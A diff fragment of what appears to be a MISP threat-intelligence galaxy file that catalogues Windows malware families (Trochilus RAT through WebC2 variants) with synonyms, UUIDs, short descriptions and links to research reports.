+ "description": "Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat",
+ "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "https://github.com/5loyd/trochilus/"
+ ]
+ },
+ "uuid": "1c3ee140-8c47-4aa7-9723-334ccd886c4e",
+ "value": "Trochilus RAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Shade"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh",
+ "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/",
+ "https://securelist.com/the-shade-encryptor-a-double-threat/72087/"
+ ]
+ },
+ "uuid": "41acd50d-e602-41a9-85e7-c091fb4bc126",
+ "value": "Troldesh",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trump_ransom"
+ ]
+ },
+ "uuid": 
"48deadcc-1a67-442d-b181-fdaaa337c4bb",
+ "value": "Trump Ransom",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tsifiri"
+ ]
+ },
+ "uuid": "3da6f62c-9e06-4e7b-8852-7c7689f65833",
+ "value": "Tsifiri",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup",
+ "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html"
+ ]
+ },
+ "uuid": "fab34d66-5668-460a-bc0f-250b9417cdbf",
+ "value": "TURNEDUP",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tyupkin",
+ "https://www.lastline.com/labsblog/tyupkin-atm-malware/"
+ ]
+ },
+ "uuid": "c28e9055-b656-4b7a-aa91-fe478a83fe4c",
+ "value": "Tyupkin",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Akagi"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme",
+ "https://github.com/hfiref0x/UACME"
+ ]
+ },
+ "uuid": "ccde5b0d-fe13-48e6-a6f4-4e434ce29371",
+ "value": "UACMe",
+ "description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors." 
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos",
+ "https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dns",
+ "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html"
+ ]
+ },
+ "uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc",
+ "value": "UDPoS",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uiwix",
+ "https://www.minerva-labs.com/post/uiwix-evasive-ransomware-exploiting-eternalblue"
+ ]
+ },
+ "uuid": "5e362cd1-bc5c-4225-b820-00ec7ebebadd",
+ "value": "Uiwix",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001"
+ ]
+ },
+ "uuid": "72961adc-ace1-4593-99f1-266119ddeccb",
+ "value": "Unidentified 001",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003"
+ ]
+ },
+ "uuid": "0e435b5d-37df-47cc-a1c4-1afb82df83d1",
+ "value": "Unidentified 003",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_005"
+ ]
+ },
+ "uuid": "",
+ "value": "",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006"
+ ]
+ },
+ "uuid": "c0a40d42-33bb-4eca-8121-f636aeec14c6",
+ "value": "Unidentified 006",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware",
+ "http://blog.talosintelligence.com/2017/02/korean-maldoc.html"
+ ]
+ },
+ "uuid": "b1cc4c79-30a5-485d-bd7f-8625c1cb5956",
+ "value": "Unidentified 013 (Korean)",
+ 
"description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7",
+ "https://wikileaks.org/ciav7p1/cms/page_34308128.html"
+ ]
+ },
+ "uuid": "40c66571-164c-4050-9c84-f37c9cd84055",
+ "value": "Unidentified 020 (Vault7)",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_022_ransom"
+ ]
+ },
+ "uuid": "5424d89e-1b7a-4632-987b-67fd27621d6f",
+ "value": "Unidentified 022 (Ransom)",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023"
+ ]
+ },
+ "uuid": "a936a595-f03d-4d8c-848e-2a3525c0415b",
+ "value": "Unidentified 023",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_024_ransom",
+ "https://twitter.com/malwrhunterteam/status/789161704106127360"
+ ]
+ },
+ "uuid": "acf6c476-847c-477a-b640-18a5c99e3c2b",
+ "value": "Unidentified 024 (Ransomware)",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_025_clickfraud",
+ "http://malware-traffic-analysis.net/2016/05/09/index.html"
+ ]
+ },
+ "uuid": "f43a0e38-2394-4538-a123-4a0457096058",
+ "value": "Unidentified 025 (Clickfraud)",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_028"
+ ]
+ },
+ "uuid": "22a686d8-dd35-4a29-9437-b0ce7b5c204b",
+ "value": "Unidentified 028",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_029"
+ ]
+ },
+ "uuid": "aff47054-7130-48ca-aa2c-247bdf44f180",
+ "value": 
"Unidentified 029",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_030",
+ "https://twitter.com/JaromirHorejsi/status/877811773826641920"
+ ]
+ },
+ "uuid": "7287a0b0-b943-4007-952f-07b9475ec184",
+ "value": "Filecoder",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031"
+ ]
+ },
+ "uuid": "122c1c9c-3131-4014-856c-7e8a0da57a6e",
+ "value": "Unidentified 031",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_032",
+ "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/"
+ ]
+ },
+ "uuid": "799921d7-48e8-47a6-989e-487b527af37a",
+ "value": "Unidentified 032",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_033"
+ ]
+ },
+ "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f",
+ "value": "Unidentified 033",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_034",
+ "https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/"
+ ]
+ },
+ "uuid": "f90e9fb9-d60d-415e-9f7f-786ee45f6947",
+ "value": "Unidentified 034",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_035"
+ ]
+ },
+ "uuid": "ba014661-d1d4-4a69-a698-9f4120de9260",
+ "value": "Unidentified 035",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037"
+ ]
+ },
+ "uuid": "d073f9e5-8aa8-4e66-ba47-f332759199a2",
+ "value": "Unidentified 037",
+ 
"description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_038"
+ ]
+ },
+ "uuid": "d53e96c5-abfa-4be4-bb33-0a898c5aff58",
+ "value": "Unidentified 038",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039"
+ ]
+ },
+ "uuid": "97c1524a-c052-49d1-8770-14b513d8a830",
+ "value": "Unidentified 039",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041"
+ ]
+ },
+ "uuid": "88d70171-fc89-44d1-8931-035c0b095247",
+ "value": "Unidentified 041",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042",
+ "http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/"
+ ]
+ },
+ "uuid": "168bf2a1-45a5-41ac-b364-5740e7ce9757",
+ "value": "Unidentified 042",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044"
+ ]
+ },
+ "uuid": "df9c8440-b4da-4226-b982-e510d06cf246",
+ "value": "Unidentified 044",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045"
+ ]
+ },
+ "uuid": "4cb8235a-7e70-4fad-9244-69215750d559",
+ "value": "Unidentified 045",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_046",
+ "https://twitter.com/DrunkBinary/status/1006534471687004160"
+ ]
+ },
+ "uuid": "878ab9fc-a526-43bd-81ac-3eba14ba0f1f",
+ "value": "Unidentified 046",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_047",
+ "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"
+ ]
+ },
+ "uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2",
+ "value": "Unidentified 047",
+ "description": "RAT written in Delphi used by Patchwork APT."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_048",
+ "https://twitter.com/DrunkBinary/status/1002587521073721346"
+ ]
+ },
+ "uuid": "3304c5ce-85f0-4648-b95f-33cf9621cd2f",
+ "value": "Unidentified 048 (Lazarus?)",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_049",
+ "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/"
+ ]
+ },
+ "uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb",
+ "value": "Unidentified 049 (Lazarus/RAT)",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_051",
+ "https://twitter.com/CDA/status/1014144988454772736"
+ ]
+ },
+ "uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5",
+ "value": "Unidentified 051",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_052"
+ ]
+ },
+ "uuid": "80c12fcd-e5ef-4549-860d-7928363022f9",
+ "value": "Unidentified 052",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053",
+ "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/"
+ ]
+ },
+ "uuid": "b60e32bd-158a-42b9-ac21-288bca4c8233",
+ "value": "Unidentified 053 (Wonknu?)",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unlock92",
+ "https://twitter.com/struppigel/status/810753660737073153",
+ "https://twitter.com/bartblaze/status/976188821078462465"
+ ]
+ },
+ "uuid": "036e657f-a752-4a4c-bb30-f15c24d954e6",
+ "value": "Unlock92",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Rombrast"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.upas",
+ "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/",
+ "https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html",
+ "https://twitter.com/ulexec/status/1005096227741020160"
+ ]
+ },
+ "uuid": "b64ea39b-3ec2-49e3-8992-02d71c21b1bd",
+ "value": "UPAS",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre",
+ "https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/",
+ "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/",
+ "https://secrary.com/ReversingMalware/Upatre/"
+ ]
+ },
+ "uuid": "925390a6-f88d-46dc-96ae-4ebc9f0b50b0",
+ "value": "Upatre",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy"
+ ]
+ },
+ "uuid": "5af4838f-1b4d-4f0b-bd27-50ef532e84f7",
+ "value": "Urausy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Bebloh",
+ "Shiotob"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone",
+ "https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations",
+ "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html",
+ "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/",
+ "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/",
+ 
"https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan",
+ "https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/",
+ "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/"
+ ]
+ },
+ "uuid": "ed9f995b-1b41-4b83-a978-d956670fdfbe",
+ "value": "UrlZone",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Snake"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos"
+ ]
+ },
+ "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c",
+ "value": "Uroburos",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Catch",
+ "grabnew",
+ "NeverQuest"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak",
+ "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/",
+ "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf",
+ "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html",
+ "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak",
+ "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/"
+ ]
+ },
+ "uuid": "b662c253-5c87-4ae6-a30e-541db0845f67",
+ "value": "Vawtrak",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.velso",
+ "https://www.bleepingcomputer.com/news/security/the-velso-ransomware-being-manually-installed-by-attackers/"
+ ]
+ },
+ "uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f",
+ "value": "Velso Ransomware",
+ "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. 
"
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.venus_locker",
+ "https://twitter.com/JaromirHorejsi/status/813690129088937984"
+ ]
+ },
+ "uuid": "7a0137ad-df7a-4fae-8365-eb36cc7e60cd",
+ "value": "Venus Locker",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin",
+ "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/",
+ "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/"
+ ]
+ },
+ "uuid": "2d07a1bf-1d8d-4f1e-a02f-1a8ff5b76cd1",
+ "value": "Vermin",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder",
+ "https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/"
+ ]
+ },
+ "uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255",
+ "value": "Vflooder",
+ "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect." 
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor",
+ "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+ ]
+ },
+ "uuid": "30161733-993f-4a1c-bcc5-7b4f1cd7d9e4",
+ "value": "virdetdoor",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut",
+ "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/",
+ "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/"
+ ]
+ },
+ "uuid": "2e99f27c-6791-4695-b88b-de4d4cbda8d6",
+ "value": "Virut",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "VMzeus",
+ "ZeusVM",
+ "Zberp"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus",
+ "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/",
+ "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/",
+ "https://asert.arbornetworks.com/wp-content/uploads/2015/08/ZeusVM_Bits_and_Pieces.pdf"
+ ]
+ },
+ "uuid": "c32740a4-db2c-4d71-80bd-7377185f4a6f",
+ "value": "VM Zeus",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus",
+ "http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/"
+ ]
+ },
+ "uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840",
+ "value": "Vobfus",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "FALLCHILL",
+ "Manuscrypt"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer",
+ "https://www.us-cert.gov/ncas/alerts/TA17-318B"
+ ]
+ },
+ "uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f",
+ "value": 
"Volgmer",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vreikstadi",
+ "https://twitter.com/malware_traffic/status/821483557990318080"
+ ]
+ },
+ "uuid": "ab2a63f1-1afd-44e7-9cf4-c775dbee78f4",
+ "value": "Vreikstadi",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer",
+ "http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis",
+ "http://www.xylibox.com/2013/01/vskimmer.html",
+ "https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/"
+ ]
+ },
+ "uuid": "3eae1764-7ea6-43e6-85a1-b1dd0b4856b8",
+ "value": "vSkimmer",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times",
+ "https://attack.mitre.org/wiki/Group/G0022"
+ ]
+ },
+ "uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8",
+ "value": "w32times",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Wcry",
+ "WannaCry",
+ "Wana Decrypt0r"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor",
+ "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984",
+ "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today",
+ "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/",
+ "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign",
+ "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/",
+ "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/",
+ "https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58",
+ 
"https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html",
+ "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e",
+ "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html",
+ "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168",
+ "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/",
+ "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d",
+ "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group",
+ "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/",
+ "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html"
+ ]
+ },
+ "uuid": "ad67ff31-2a02-43f9-8b12-7df7e4fcccd6",
+ "value": "WannaCryptor",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer",
+ "https://blog.minerva-labs.com/waterminer-a-new-evasive-crypto-miner"
+ ]
+ },
+ "uuid": "d536931e-ad4f-485a-b93d-fe05f23a9367",
+ "value": "WaterMiner",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout",
+ "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html"
+ ]
+ },
+ "uuid": "d238262a-4832-408f-9926-a7174e671b50",
+ "value": "WaterSpout",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_adspace",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "e57c677f-0117-4e23-8c3f-a772ed809f4c",
+ "value": "WebC2-AdSpace",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ausov",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "64f5ae85-1324-43de-ba3a-063785567be0",
+ "value": "WebC2-Ausov",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_bolid",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "71292a08-9a7b-4df1-b1fd-7d80a8fcc18f",
+ "value": "WebC2-Bolid",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_cson",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "5371bc44-dc07-4992-a3d7-c21705c50ac4",
+ "value": "WebC2-Cson",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_div",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "acdda3e5-e776-419b-b060-14f3406de061",
+ "value": "WebC2-DIV",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_greencat",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "cfed10ed-6601-469e-a1df-2d561b031244",
+ "value": "WebC2-GreenCat",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_head",
+ 
"https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "f9f37707-36cf-4ad0-88e0-86f47cbe0ed6",
+ "value": "WebC2-Head",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_kt3",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
